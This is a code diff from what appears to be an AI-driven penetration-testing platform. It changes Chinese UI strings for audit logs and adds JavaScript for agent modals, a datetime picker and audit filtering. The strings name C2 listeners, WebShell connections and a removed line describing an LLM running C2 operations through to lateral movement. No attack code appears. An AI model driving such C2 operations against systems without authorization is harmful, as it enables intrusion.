"preset7d": "最近7天",
"presetToday": "今天",
"pickerHour": "时",
"pickerMinute": "分",
"pickerClear": "清除",
"pickerToday": "今天",
"pickerConfirm": "确定",
"filterQuery": "关键词", "filterQuery": "关键词",
"filterQueryPlaceholder": "消息 / 资源 ID / 操作名", "filterQueryPlaceholder": "消息 / 资源 ID / 操作名",
"colTime": "时间",
"colMessage": "说明",
"colCategory": "类别",
"colAction": "操作",
"colResult": "结果",
"colIp": "IP",
"colResource": "资源 ID",
"cat": { "cat": {
"auth": "认证", "auth": "认证",
"config": "配置", "config": "配置",
@@ -2112,6 +2176,93 @@
"exportDone": "导出完成", "exportDone": "导出完成",
"loading": "加载中...", "loading": "加载中...",
"empty": "暂无审计记录", "empty": "暂无审计记录",
"result": {
"success": "成功",
"failure": "失败"
},
"msg": {
"auth": {
"login": "登录成功",
"login_failed": "登录失败:密码错误",
"logout": "退出登录",
"change_password": "登录密码已修改",
"change_password_failed": "修改密码失败:当前密码不正确"
},
"config": {
"apply": "配置已应用",
"update": "更新内存配置",
"apply_fail_kb_init": "应用配置失败:初始化知识库",
"apply_fail_kb_reinit": "应用配置失败:重新初始化知识库",
"apply_fail_c2": "应用配置失败:C2"
},
"conversation": {
"create": "创建对话",
"delete": "删除对话",
"delete_turn": "删除对话轮次"
},
"c2": {
"listener_create": "创建 C2 监听器",
"listener_delete": "删除 C2 监听器",
"listener_start": "启动 C2 监听器",
"listener_stop": "停止 C2 监听器",
"session_delete": "删除 C2 会话",
"task_create": "创建 C2 任务",
"task_cancel": "取消 C2 任务",
"task_delete": "批量删除 C2 任务"
},
"webshell": {
"connection_create": "创建 WebShell 连接",
"connection_delete": "删除 WebShell 连接"
},
"knowledge": {
"item_delete": "删除知识项",
"index_rebuild": "重建知识库索引"
},
"vulnerability": {
"create": "创建漏洞记录",
"update": "更新漏洞记录",
"delete": "删除漏洞记录",
"delete_batch": "批量删除漏洞记录"
},
"external_mcp": {
"upsert": "更新外部 MCP 配置",
"delete": "删除外部 MCP 配置"
},
"task": {
"create_queue": "创建批量任务队列",
"start_queue": "启动批量任务队列",
"delete_queue": "删除批量任务队列",
"pause_queue": "暂停批量任务队列",
"rerun_queue": "重跑批量任务队列",
"delete_batch_task": "删除批量子任务"
},
"tool": {
"execution_delete": "删除工具执行记录",
"execution_delete_batch": "批量删除工具执行记录"
},
"file": {
"upload": "上传对话附件",
"delete": "删除对话附件"
},
"hitl": {
"decision": "HITL 审批决策"
},
"role": {
"create": "创建角色",
"update": "更新角色",
"delete": "删除角色"
},
"skill": {
"create": "创建 Skill",
"update": "更新 Skill",
"delete": "删除 Skill"
},
"agent": {
"markdown_create": "创建 Markdown 子代理",
"markdown_update": "更新 Markdown 子代理",
"markdown_delete": "删除 Markdown 子代理"
}
},
"paginationShow": "显示 {{start}}-{{end}} / 共 {{total}} 条", "paginationShow": "显示 {{start}}-{{end}} / 共 {{total}} 条",
"detailTitle": "审计详情", "detailTitle": "审计详情",
"detailTime": "时间", "detailTime": "时间",
@@ -2190,7 +2341,8 @@
"copyContent": "复制内容", "copyContent": "复制内容",
"correctInfo": "正确信息", "correctInfo": "正确信息",
"errorInfo": "错误信息", "errorInfo": "错误信息",
"copyError": "复制错误" "copyError": "复制错误",
"contentTruncated": "…(展示已截断;完整内容见 persisted-output 中的文件路径,用 read_file 读取)"
}, },
"attackChainModal": { "attackChainModal": {
"title": "攻击链可视化", "title": "攻击链可视化",
@@ -2282,7 +2434,7 @@
"selectAll": "全选", "selectAll": "全选",
"deleteSelected": "删除所选", "deleteSelected": "删除所选",
"confirmDeleteNone": "请先选择要删除的对话", "confirmDeleteNone": "请先选择要删除的对话",
"confirmDeleteN": "确定要删除选中的 {{count}} 条对话吗?", "confirmDeleteN": "确定要删除选中的 {{count}} 条对话吗?对话消息将不可恢复,但已记录的漏洞会保留在漏洞库中。",
"deleteFailed": "删除失败", "deleteFailed": "删除失败",
"unnamedConversation": "未命名对话" "unnamedConversation": "未命名对话"
}, },
@@ -2428,6 +2580,7 @@
"statusConfirmed": "已确认", "statusConfirmed": "已确认",
"statusFixed": "已修复", "statusFixed": "已修复",
"statusFalsePositive": "误报", "statusFalsePositive": "误报",
"statusIgnored": "已忽略",
"type": "漏洞类型", "type": "漏洞类型",
"typePlaceholder": "如:SQL注入、XSS、CSRF等", "typePlaceholder": "如:SQL注入、XSS、CSRF等",
"target": "目标", "target": "目标",
@@ -2518,14 +2671,6 @@
"checkboxLinkTitle": "勾选表示本角色关联使用该工具" "checkboxLinkTitle": "勾选表示本角色关联使用该工具"
}, },
"c2": { "c2": {
"title": "C2 管理",
"welcomeTitle": "AI-Native C2 框架",
"welcomeDesc": "以 MCP 工具为一等公民,让 LLM 可以像调用 nmap 一样调用 C2 完成「上线 → 控制 → 任务 → 横向 → 清场」全流程",
"statListeners": "运行中监听器",
"statSessions": "在线会话",
"statPending": "待审任务",
"goListeners": "管理监听器",
"goSessions": "查看会话",
"clipboardCopied": "已复制到剪贴板", "clipboardCopied": "已复制到剪贴板",
"fmt": { "fmt": {
"durationMs": "{{n}}ms", "durationMs": "{{n}}ms",
+20 -17
View File
@@ -105,45 +105,48 @@ function showAddMarkdownAgentModal() {
document.getElementById('agent-md-bind-role').value = ''; document.getElementById('agent-md-bind-role').value = '';
document.getElementById('agent-md-max-iter').value = '0'; document.getElementById('agent-md-max-iter').value = '0';
document.getElementById('agent-md-instruction').value = ''; document.getElementById('agent-md-instruction').value = '';
if (modal) modal.style.display = 'flex'; openAppModal('agent-md-modal');
} }
async function editMarkdownAgent(filename) { async function editMarkdownAgent(filename) {
if (!filename) return; if (!filename) return;
const modal = document.getElementById('agent-md-modal');
const title = document.getElementById('agent-md-modal-title'); const title = document.getElementById('agent-md-modal-title');
const row = document.getElementById('agent-md-filename-row'); const row = document.getElementById('agent-md-filename-row');
markdownAgentsEditingFilename = null; markdownAgentsEditingFilename = null;
markdownAgentsEditingIsOrchestrator = false; markdownAgentsEditingIsOrchestrator = false;
if (title) title.textContent = _agentsT('agentsPage.editTitle'); if (title) title.textContent = _agentsT('agentsPage.editTitle');
if (row) row.style.display = 'none'; if (row) row.style.display = 'none';
document.getElementById('agent-md-instruction').value = '';
openAppModal('agent-md-modal', { focus: false });
try { try {
const r = await apiFetch('/api/multi-agent/markdown-agents/' + encodeURIComponent(filename)); const r = await apiFetch('/api/multi-agent/markdown-agents/' + encodeURIComponent(filename));
const data = await r.json(); const data = await r.json();
if (!r.ok) throw new Error(data.error || r.statusText); if (!r.ok) throw new Error(data.error || r.statusText);
markdownAgentsEditingFilename = data.filename || filename; markdownAgentsEditingFilename = data.filename || filename;
markdownAgentsEditingIsOrchestrator = !!data.is_orchestrator; markdownAgentsEditingIsOrchestrator = !!data.is_orchestrator;
document.getElementById('agent-md-filename-current').value = data.filename || filename; deferModalContent(function () {
document.getElementById('agent-md-filename').value = data.filename || filename; document.getElementById('agent-md-filename-current').value = data.filename || filename;
document.getElementById('agent-md-filename').disabled = true; document.getElementById('agent-md-filename').value = data.filename || filename;
var roleEl2 = document.getElementById('agent-md-role'); document.getElementById('agent-md-filename').disabled = true;
if (roleEl2) roleEl2.value = data.is_orchestrator ? 'orchestrator' : 'sub'; var roleEl2 = document.getElementById('agent-md-role');
document.getElementById('agent-md-id').value = data.id || ''; if (roleEl2) roleEl2.value = data.is_orchestrator ? 'orchestrator' : 'sub';
document.getElementById('agent-md-name').value = data.name || ''; document.getElementById('agent-md-id').value = data.id || '';
document.getElementById('agent-md-description').value = data.description || ''; document.getElementById('agent-md-name').value = data.name || '';
document.getElementById('agent-md-tools').value = Array.isArray(data.tools) ? data.tools.join(', ') : ''; document.getElementById('agent-md-description').value = data.description || '';
document.getElementById('agent-md-bind-role').value = data.bind_role || ''; document.getElementById('agent-md-tools').value = Array.isArray(data.tools) ? data.tools.join(', ') : '';
document.getElementById('agent-md-max-iter').value = String(data.max_iterations != null ? data.max_iterations : 0); document.getElementById('agent-md-bind-role').value = data.bind_role || '';
document.getElementById('agent-md-instruction').value = data.instruction || ''; document.getElementById('agent-md-max-iter').value = String(data.max_iterations != null ? data.max_iterations : 0);
if (modal) modal.style.display = 'flex'; document.getElementById('agent-md-instruction').value = data.instruction || '';
document.getElementById('agent-md-name')?.focus();
});
} catch (e) { } catch (e) {
closeMarkdownAgentModal();
showNotification(_agentsT('agentsPage.loadOneFailed') + ': ' + e.message, 'error'); showNotification(_agentsT('agentsPage.loadOneFailed') + ': ' + e.message, 'error');
} }
} }
function closeMarkdownAgentModal() { function closeMarkdownAgentModal() {
const modal = document.getElementById('agent-md-modal'); closeAppModal('agent-md-modal');
if (modal) modal.style.display = 'none';
markdownAgentsEditingFilename = null; markdownAgentsEditingFilename = null;
markdownAgentsEditingIsOrchestrator = false; markdownAgentsEditingIsOrchestrator = false;
} }
+428
View File
@@ -0,0 +1,428 @@
/**
* Audit log datetime picker cross-browser, locale-aware (SLS-style calendar + time columns).
*/
(function () {
'use strict';
var registry = {};
var popover = null;
var activeFieldId = null;
var draft = null;
var viewYear = 0;
var viewMonth = 0;
function pad2(n) {
return String(n).padStart(2, '0');
}
function pickerLocale() {
if (typeof auditLocale === 'function') return auditLocale();
if (typeof window.__locale === 'string' && window.__locale.startsWith('zh')) return 'zh-CN';
return 'en-US';
}
function pickerT(key, fallback) {
if (typeof auditT === 'function') return auditT(key, null, fallback);
if (typeof t === 'function') {
var v = t(key);
if (v && v !== key) return v;
}
return fallback;
}
function partsToStorage(p) {
if (!p) return '';
return p.y + '-' + pad2(p.m) + '-' + pad2(p.d) + 'T' + pad2(p.h) + ':' + pad2(p.mi);
}
function parseStorage(value) {
if (!value) return null;
var m = /^(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2})/.exec(String(value).trim());
if (!m) return null;
return { y: +m[1], m: +m[2], d: +m[3], h: +m[4], mi: +m[5] };
}
function formatDisplay(parts) {
if (!parts) return '';
var loc = pickerLocale();
try {
var d = new Date(parts.y, parts.m - 1, parts.d, parts.h, parts.mi, 0, 0);
return d.toLocaleString(loc, {
year: 'numeric',
month: '2-digit',
day: '2-digit',
hour: '2-digit',
minute: '2-digit',
hour12: false
});
} catch (_) {
return partsToStorage(parts).replace('T', ' ');
}
}
function nowParts() {
var n = new Date();
return { y: n.getFullYear(), m: n.getMonth() + 1, d: n.getDate(), h: n.getHours(), mi: n.getMinutes() };
}
function startOfTodayParts() {
var n = new Date();
return { y: n.getFullYear(), m: n.getMonth() + 1, d: n.getDate(), h: 0, mi: 0 };
}
function monthTitle(year, month) {
var loc = pickerLocale();
if (loc.startsWith('zh')) {
return year + '\u5e74' + pad2(month) + '\u6708';
}
try {
return new Date(year, month - 1, 1).toLocaleString(loc, { month: 'long', year: 'numeric' });
} catch (_) {
return year + '-' + pad2(month);
}
}
function weekdayHeaders() {
var loc = pickerLocale();
if (loc.startsWith('zh')) {
return ['\u65e5', '\u4e00', '\u4e8c', '\u4e09', '\u56db', '\u4e94', '\u516d'];
}
return ['Su', 'Mo', 'Tu', 'We', 'Th', 'Fr', 'Sa'];
}
function buildMonthGrid(year, month) {
var first = new Date(year, month - 1, 1);
var start = new Date(first);
start.setDate(first.getDate() - first.getDay());
var cells = [];
var cursor = new Date(start);
for (var i = 0; i < 42; i++) {
cells.push({
y: cursor.getFullYear(),
m: cursor.getMonth() + 1,
d: cursor.getDate(),
inMonth: cursor.getMonth() === month - 1
});
cursor.setDate(cursor.getDate() + 1);
}
return cells;
}
function ensurePopover() {
if (popover) return popover;
popover = document.createElement('div');
popover.className = 'audit-dt-popover';
popover.hidden = true;
popover.setAttribute('role', 'dialog');
popover.innerHTML =
'<div class="audit-dt-popover-inner">' +
'<div class="audit-dt-head">' +
'<button type="button" class="audit-dt-nav" data-nav="prev" aria-label="prev">&lsaquo;</button>' +
'<span class="audit-dt-month-label"></span>' +
'<button type="button" class="audit-dt-nav" data-nav="next" aria-label="next">&rsaquo;</button>' +
'</div>' +
'<div class="audit-dt-body">' +
'<div class="audit-dt-calendar"></div>' +
'<div class="audit-dt-time">' +
'<div class="audit-dt-time-col" data-part="hour">' +
'<span class="audit-dt-time-label audit-dt-hour-label"></span>' +
'<div class="audit-dt-time-list"></div>' +
'</div>' +
'<div class="audit-dt-time-col" data-part="minute">' +
'<span class="audit-dt-time-label audit-dt-minute-label"></span>' +
'<div class="audit-dt-time-list"></div>' +
'</div>' +
'</div>' +
'</div>' +
'<div class="audit-dt-footer">' +
'<button type="button" class="audit-dt-footer-btn" data-action="clear"></button>' +
'<button type="button" class="audit-dt-footer-btn" data-action="today"></button>' +
'<button type="button" class="audit-dt-footer-btn audit-dt-footer-btn--primary" data-action="confirm"></button>' +
'</div>' +
'</div>';
document.body.appendChild(popover);
popover.addEventListener('click', function (ev) {
ev.stopPropagation();
var btn = ev.target.closest('[data-nav]');
if (btn) {
if (btn.getAttribute('data-nav') === 'prev') {
viewMonth -= 1;
if (viewMonth < 1) { viewMonth = 12; viewYear -= 1; }
} else {
viewMonth += 1;
if (viewMonth > 12) { viewMonth = 1; viewYear += 1; }
}
renderPopover();
return;
}
var dayBtn = ev.target.closest('[data-day]');
if (dayBtn && draft) {
draft.y = +dayBtn.getAttribute('data-y');
draft.m = +dayBtn.getAttribute('data-m');
draft.d = +dayBtn.getAttribute('data-d');
if (draft.y !== viewYear || draft.m !== viewMonth) {
viewYear = draft.y;
viewMonth = draft.m;
renderCalendar();
} else {
updateDaySelection();
}
return;
}
var timeBtn = ev.target.closest('[data-time]');
if (timeBtn && draft) {
var part = timeBtn.getAttribute('data-part');
var val = +timeBtn.getAttribute('data-time');
if (part === 'hour') draft.h = val;
if (part === 'minute') draft.mi = val;
updateTimeSelection();
return;
}
var actionBtn = ev.target.closest('[data-action]');
if (!actionBtn) return;
var action = actionBtn.getAttribute('data-action');
if (action === 'clear') {
applyValue(activeFieldId, '');
closePopover();
} else if (action === 'today') {
if (draft) {
var t = nowParts();
draft.y = t.y; draft.m = t.m; draft.d = t.d;
viewYear = t.y; viewMonth = t.m;
}
renderPopover();
} else if (action === 'confirm') {
applyValue(activeFieldId, partsToStorage(draft));
closePopover();
}
});
document.addEventListener('click', onDocumentClick);
document.addEventListener('keydown', onDocumentKeydown);
document.addEventListener('languagechange', function () {
if (!popover.hidden) renderPopover();
refreshAllDisplays();
});
return popover;
}
function onDocumentClick(ev) {
if (!popover || popover.hidden) return;
if (popover.contains(ev.target)) return;
if (activeFieldId && registry[activeFieldId] && registry[activeFieldId].wrap.contains(ev.target)) return;
closePopover();
}
function onDocumentKeydown(ev) {
if (ev.key === 'Escape' && popover && !popover.hidden) {
closePopover();
}
}
function positionPopover(fieldWrap) {
var rect = fieldWrap.getBoundingClientRect();
var width = 320;
popover.style.width = width + 'px';
var left = rect.left;
if (left + width > window.innerWidth - 12) {
left = Math.max(12, window.innerWidth - width - 12);
}
popover.style.left = left + 'px';
var top = rect.bottom + 6;
if (top + 340 > window.innerHeight - 12) {
top = Math.max(12, rect.top - 340 - 6);
}
popover.style.top = top + 'px';
}
function renderCalendar() {
if (!popover || !draft) return;
popover.querySelector('.audit-dt-month-label').textContent = monthTitle(viewYear, viewMonth);
var cal = popover.querySelector('.audit-dt-calendar');
var headers = weekdayHeaders();
var html = '<div class="audit-dt-weekdays">';
headers.forEach(function (h) { html += '<span>' + h + '</span>'; });
html += '</div><div class="audit-dt-days">';
buildMonthGrid(viewYear, viewMonth).forEach(function (cell) {
var cls = 'audit-dt-day';
if (!cell.inMonth) cls += ' is-other-month';
if (draft && cell.y === draft.y && cell.m === draft.m && cell.d === draft.d) cls += ' is-selected';
html += '<button type="button" class="' + cls + '" data-day="1" data-y="' + cell.y +
'" data-m="' + cell.m + '" data-d="' + cell.d + '">' + cell.d + '</button>';
});
html += '</div>';
cal.innerHTML = html;
}
function renderTimeLists() {
if (!popover || !draft) return;
var hourList = popover.querySelector('[data-part="hour"] .audit-dt-time-list');
var minuteList = popover.querySelector('[data-part="minute"] .audit-dt-time-list');
var hourHtml = '';
var minuteHtml = '';
var h;
for (h = 0; h < 24; h++) {
hourHtml += '<button type="button" class="audit-dt-time-item' + (draft && draft.h === h ? ' is-selected' : '') +
'" data-part="hour" data-time="' + h + '">' + pad2(h) + '</button>';
}
for (h = 0; h < 60; h++) {
minuteHtml += '<button type="button" class="audit-dt-time-item' + (draft && draft.mi === h ? ' is-selected' : '') +
'" data-part="minute" data-time="' + h + '">' + pad2(h) + '</button>';
}
hourList.innerHTML = hourHtml;
minuteList.innerHTML = minuteHtml;
scrollTimeSelection(hourList, draft.h);
scrollTimeSelection(minuteList, draft.mi);
}
function updateDaySelection() {
if (!popover || !draft) return;
popover.querySelectorAll('.audit-dt-day').forEach(function (btn) {
var selected = +btn.getAttribute('data-y') === draft.y &&
+btn.getAttribute('data-m') === draft.m &&
+btn.getAttribute('data-d') === draft.d;
btn.classList.toggle('is-selected', selected);
});
}
function updateTimeSelection() {
if (!popover || !draft) return;
var hourList = popover.querySelector('[data-part="hour"] .audit-dt-time-list');
var minuteList = popover.querySelector('[data-part="minute"] .audit-dt-time-list');
if (!hourList || !minuteList || !hourList.children.length) {
renderTimeLists();
return;
}
hourList.querySelectorAll('.audit-dt-time-item').forEach(function (btn) {
btn.classList.toggle('is-selected', +btn.getAttribute('data-time') === draft.h);
});
minuteList.querySelectorAll('.audit-dt-time-item').forEach(function (btn) {
btn.classList.toggle('is-selected', +btn.getAttribute('data-time') === draft.mi);
});
scrollTimeSelection(hourList, draft.h);
scrollTimeSelection(minuteList, draft.mi);
}
function renderPopover() {
if (!popover || !draft) return;
popover.querySelector('.audit-dt-hour-label').textContent = pickerT('settingsAudit.pickerHour', 'Hour');
popover.querySelector('.audit-dt-minute-label').textContent = pickerT('settingsAudit.pickerMinute', 'Min');
popover.querySelector('[data-action="clear"]').textContent = pickerT('settingsAudit.pickerClear', 'Clear');
popover.querySelector('[data-action="today"]').textContent = pickerT('settingsAudit.pickerToday', 'Today');
popover.querySelector('[data-action="confirm"]').textContent = pickerT('settingsAudit.pickerConfirm', 'OK');
renderCalendar();
renderTimeLists();
}
function scrollTimeSelection(listEl, value) {
var sel = listEl.querySelector('.is-selected');
if (sel && sel.scrollIntoView) {
sel.scrollIntoView({ block: 'center' });
}
}
function openPopover(fieldId) {
ensurePopover();
var entry = registry[fieldId];
if (!entry) return;
activeFieldId = fieldId;
var stored = entry.wrap.dataset.value || '';
draft = parseStorage(stored) || nowParts();
viewYear = draft.y;
viewMonth = draft.m;
renderPopover();
positionPopover(entry.wrap);
popover.hidden = false;
}
function closePopover() {
if (!popover) return;
popover.hidden = true;
activeFieldId = null;
draft = null;
}
function refreshDisplay(fieldId) {
var entry = registry[fieldId];
if (!entry) return;
var parts = parseStorage(entry.wrap.dataset.value || '');
entry.input.value = parts ? formatDisplay(parts) : '';
entry.input.placeholder = pickerT('settingsAudit.datetimePlaceholder', 'Select date & time');
entry.clearBtn.hidden = !parts;
}
function refreshAllDisplays() {
Object.keys(registry).forEach(refreshDisplay);
}
function applyValue(fieldId, storageValue) {
var entry = registry[fieldId];
if (!entry) return;
entry.wrap.dataset.value = storageValue || '';
refreshDisplay(fieldId);
}
function bindField(fieldId) {
var wrap = document.getElementById(fieldId);
if (!wrap || wrap.dataset.auditDtBound === '1') return;
var input = wrap.querySelector('.audit-datetime-input');
var openBtn = wrap.querySelector('.audit-datetime-open-btn');
var clearBtn = wrap.querySelector('.audit-datetime-clear-btn');
if (!input || !openBtn || !clearBtn) return;
wrap.dataset.auditDtBound = '1';
registry[fieldId] = { wrap: wrap, input: input, clearBtn: clearBtn };
openBtn.addEventListener('click', function (ev) {
ev.preventDefault();
ev.stopPropagation();
if (!popover || popover.hidden || activeFieldId !== fieldId) {
openPopover(fieldId);
} else {
closePopover();
}
});
input.addEventListener('click', function (ev) {
ev.stopPropagation();
openPopover(fieldId);
});
clearBtn.addEventListener('click', function (ev) {
ev.preventDefault();
ev.stopPropagation();
applyValue(fieldId, '');
});
refreshDisplay(fieldId);
}
window.AuditDatetimePicker = {
init: function () {
bindField('audit-filter-since-field');
bindField('audit-filter-until-field');
refreshAllDisplays();
},
getValue: function (inputId) {
var fieldId = inputId === 'audit-filter-since' ? 'audit-filter-since-field' : 'audit-filter-until-field';
var entry = registry[fieldId];
return entry ? (entry.wrap.dataset.value || '') : '';
},
setValue: function (inputId, dateObj) {
if (!dateObj || Number.isNaN(dateObj.getTime())) return;
var fieldId = inputId === 'audit-filter-since' ? 'audit-filter-since-field' : 'audit-filter-until-field';
var p = {
y: dateObj.getFullYear(),
m: dateObj.getMonth() + 1,
d: dateObj.getDate(),
h: dateObj.getHours(),
mi: dateObj.getMinutes()
};
applyValue(fieldId, partsToStorage(p));
},
clearAll: function () {
applyValue('audit-filter-since-field', '');
applyValue('audit-filter-until-field', '');
closePopover();
}
};
})();
+388 -87
View File
@@ -4,6 +4,7 @@
let auditLogsPage = 1; let auditLogsPage = 1;
let auditLogsPageSize = 20; let auditLogsPageSize = 20;
let auditLogsTotal = 0; let auditLogsTotal = 0;
let auditLogsCache = [];
const AUDIT_PAGE_SIZE_KEY = 'cyberstrike_audit_page_size'; const AUDIT_PAGE_SIZE_KEY = 'cyberstrike_audit_page_size';
@@ -52,24 +53,113 @@ function auditActionLabel(action) {
return auditT('settingsAudit.act.' + action, null, action); return auditT('settingsAudit.act.' + action, null, action);
} }
/** Stored DB messages that share category+action but need distinct i18n keys. */
const AUDIT_MSG_BY_STORED_TEXT = {
'登录失败:密码错误': 'settingsAudit.msg.auth.login_failed',
'修改密码失败:当前密码不正确': 'settingsAudit.msg.auth.change_password_failed',
'应用配置失败:初始化知识库': 'settingsAudit.msg.config.apply_fail_kb_init',
'应用配置失败:重新初始化知识库': 'settingsAudit.msg.config.apply_fail_kb_reinit',
'应用配置失败:C2': 'settingsAudit.msg.config.apply_fail_c2'
};
function auditMessageLabel(log) {
if (!log) return '';
const raw = (log.message || '').trim();
if (raw && AUDIT_MSG_BY_STORED_TEXT[raw]) {
return auditT(AUDIT_MSG_BY_STORED_TEXT[raw], null, raw);
}
const cat = (log.category || '').trim();
const act = (log.action || '').trim();
const res = (log.result || '').trim();
if (cat && act) {
if (cat === 'auth' && act === 'login' && res === 'failure') {
return auditT('settingsAudit.msg.auth.login_failed', null, raw);
}
if (cat === 'auth' && act === 'change_password' && res === 'failure') {
return auditT('settingsAudit.msg.auth.change_password_failed', null, raw);
}
const key = 'settingsAudit.msg.' + cat + '.' + act;
const translated = auditT(key, null, null);
if (translated && translated !== key) return translated;
}
return raw;
}
function auditResultLabel(result) {
if (!result) return '';
return auditT('settingsAudit.result.' + result, null, result);
}
function auditLocale() {
if (typeof window.__locale === 'string' && window.__locale.length) {
return window.__locale.startsWith('zh') ? 'zh-CN' : 'en-US';
}
return (typeof navigator !== 'undefined' && navigator.language) ? navigator.language : 'en-US';
}
function auditTimezoneShortLabel() {
try {
const parts = new Intl.DateTimeFormat(auditLocale(), { timeZoneName: 'short' }).formatToParts(new Date());
const tz = parts.find(function (p) { return p.type === 'timeZoneName'; });
return tz ? tz.value : '';
} catch (_) {
return '';
}
}
function formatAuditTime(iso) { function formatAuditTime(iso) {
if (!iso) return ''; if (!iso) return '';
try { try {
const d = new Date(iso); const d = new Date(iso);
if (Number.isNaN(d.getTime())) return iso; if (Number.isNaN(d.getTime())) return iso;
return d.toLocaleString(); return d.toLocaleString(auditLocale(), {
year: 'numeric',
month: '2-digit',
day: '2-digit',
hour: '2-digit',
minute: '2-digit',
second: '2-digit',
hour12: false,
timeZoneName: 'short'
});
} catch (_) { } catch (_) {
return iso; return iso;
} }
} }
/** Read stored local datetime (YYYY-MM-DDTHH:mm) from custom picker or raw input. */
function getAuditFilterDatetimeValue(inputId) {
if (typeof window.AuditDatetimePicker !== 'undefined' && typeof window.AuditDatetimePicker.getValue === 'function') {
return window.AuditDatetimePicker.getValue(inputId) || '';
}
var el = document.getElementById(inputId);
return el ? (el.value || '') : '';
}
/** datetime-local / picker storage -> UTC RFC3339 for API. */
function auditDatetimeLocalToRFC3339(value) { function auditDatetimeLocalToRFC3339(value) {
if (!value || !value.trim()) return ''; if (!value || !value.trim()) return '';
const d = new Date(value); const m = /^(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2})/.exec(value.trim());
if (!m) return '';
const d = new Date(+m[1], +m[2] - 1, +m[3], +m[4], +m[5], 0, 0);
if (Number.isNaN(d.getTime())) return ''; if (Number.isNaN(d.getTime())) return '';
return d.toISOString(); return d.toISOString();
} }
function updateAuditTimezoneHint() {
const el = document.getElementById('audit-filter-timezone-hint');
if (!el) return;
const tz = auditTimezoneShortLabel();
if (!tz) {
el.hidden = true;
el.textContent = '';
return;
}
el.hidden = false;
el.textContent = auditT('settingsAudit.filterTimeZone', { tz: tz },
'时区:' + tz + '(筛选按浏览器本地时间,API 使用 UTC)');
}
function initAuditPageSizeFromStorage() { function initAuditPageSizeFromStorage() {
try { try {
const saved = parseInt(localStorage.getItem(AUDIT_PAGE_SIZE_KEY), 10); const saved = parseInt(localStorage.getItem(AUDIT_PAGE_SIZE_KEY), 10);
@@ -113,6 +203,7 @@ function rebuildAuditActionSelect() {
actEl.disabled = true; actEl.disabled = true;
actEl.value = ''; actEl.value = '';
actEl.title = hint; actEl.title = hint;
syncAuditCustomSelect('audit-filter-action');
return; return;
} }
@@ -129,6 +220,7 @@ function rebuildAuditActionSelect() {
if (prev && Array.prototype.some.call(actEl.options, function (o) { return o.value === prev; })) { if (prev && Array.prototype.some.call(actEl.options, function (o) { return o.value === prev; })) {
actEl.value = prev; actEl.value = prev;
} }
syncAuditCustomSelect('audit-filter-action');
} }
function onAuditCategoryFilterChange() { function onAuditCategoryFilterChange() {
@@ -145,43 +237,17 @@ function buildAuditQueryParams(forExport) {
const act = document.getElementById('audit-filter-action'); const act = document.getElementById('audit-filter-action');
const res = document.getElementById('audit-filter-result'); const res = document.getElementById('audit-filter-result');
const q = document.getElementById('audit-filter-q'); const q = document.getElementById('audit-filter-q');
const since = document.getElementById('audit-filter-since');
const until = document.getElementById('audit-filter-until');
if (cat && cat.value) params.set('category', cat.value); if (cat && cat.value) params.set('category', cat.value);
if (act && !act.disabled && act.value) params.set('action', act.value); if (act && !act.disabled && act.value) params.set('action', act.value);
if (res && res.value) params.set('result', res.value); if (res && res.value) params.set('result', res.value);
if (q && q.value.trim()) params.set('q', q.value.trim()); if (q && q.value.trim()) params.set('q', q.value.trim());
const sinceISO = since ? auditDatetimeLocalToRFC3339(since.value) : ''; const sinceISO = auditDatetimeLocalToRFC3339(getAuditFilterDatetimeValue('audit-filter-since'));
const untilISO = until ? auditDatetimeLocalToRFC3339(until.value) : ''; const untilISO = auditDatetimeLocalToRFC3339(getAuditFilterDatetimeValue('audit-filter-until'));
if (sinceISO) params.set('since', sinceISO); if (sinceISO) params.set('since', sinceISO);
if (untilISO) params.set('until', untilISO); if (untilISO) params.set('until', untilISO);
return params.toString(); return params.toString();
} }
async function loadAuditMeta() {
if (typeof apiFetch !== 'function') return;
const hint = document.getElementById('audit-retention-hint');
try {
const r = await apiFetch('/api/audit/meta');
if (!r.ok) return;
const data = await r.json();
if (!hint) return;
if (!data.enabled) {
hint.hidden = false;
hint.textContent = auditT('settingsAudit.disabledHint', null, '审计功能已关闭,新操作不会写入审计表。');
return;
}
const days = data.retention_days;
if (days > 0) {
hint.hidden = false;
hint.textContent = auditT('settingsAudit.retentionHint', { days: days },
'审计记录保留 ' + days + ' 天,超期自动清理。');
} else {
hint.hidden = true;
}
} catch (_) { /* ignore */ }
}
async function loadAuditSummary() { async function loadAuditSummary() {
if (typeof apiFetch !== 'function') return; if (typeof apiFetch !== 'function') return;
const wrap = document.getElementById('audit-summary-stats'); const wrap = document.getElementById('audit-summary-stats');
@@ -191,10 +257,14 @@ async function loadAuditSummary() {
const data = await r.json(); const data = await r.json();
if (wrap) wrap.hidden = false; if (wrap) wrap.hidden = false;
const elTotal = document.getElementById('audit-stat-total'); const elTotal = document.getElementById('audit-stat-total');
const elSuccess = document.getElementById('audit-stat-success');
const elFail = document.getElementById('audit-stat-failures'); const elFail = document.getElementById('audit-stat-failures');
const elRecent = document.getElementById('audit-stat-recent'); const elRecent = document.getElementById('audit-stat-recent');
if (elTotal) elTotal.textContent = String(data.total != null ? data.total : 0); const total = data.total != null ? data.total : 0;
if (elFail) elFail.textContent = String(data.failures != null ? data.failures : 0); const failures = data.failures != null ? data.failures : 0;
if (elTotal) elTotal.textContent = String(total);
if (elSuccess) elSuccess.textContent = String(Math.max(0, total - failures));
if (elFail) elFail.textContent = String(failures);
if (elRecent) elRecent.textContent = String(data.recent_7d != null ? data.recent_7d : 0); if (elRecent) elRecent.textContent = String(data.recent_7d != null ? data.recent_7d : 0);
} catch (_) { /* ignore */ } } catch (_) { /* ignore */ }
} }
@@ -214,7 +284,8 @@ async function loadAuditLogs(page) {
throw new Error(err.error || r.statusText); throw new Error(err.error || r.statusText);
} }
const data = await r.json(); const data = await r.json();
renderAuditLogs(data.logs || []); auditLogsCache = data.logs || [];
renderAuditLogs(auditLogsCache);
auditLogsTotal = typeof data.total === 'number' ? data.total : 0; auditLogsTotal = typeof data.total === 'number' ? data.total : 0;
const maxPage = Math.max(1, Math.ceil(auditLogsTotal / auditLogsPageSize)); const maxPage = Math.max(1, Math.ceil(auditLogsTotal / auditLogsPageSize));
if (auditLogsPage > maxPage) { if (auditLogsPage > maxPage) {
@@ -234,37 +305,57 @@ async function loadAuditLogs(page) {
} }
} }
function auditResultTagClass(result) {
return result === 'failure' ? 'audit-tag--fail' : 'audit-tag--ok';
}
function renderAuditLogs(logs) { function renderAuditLogs(logs) {
const listEl = document.getElementById('audit-log-list'); const listEl = document.getElementById('audit-log-list');
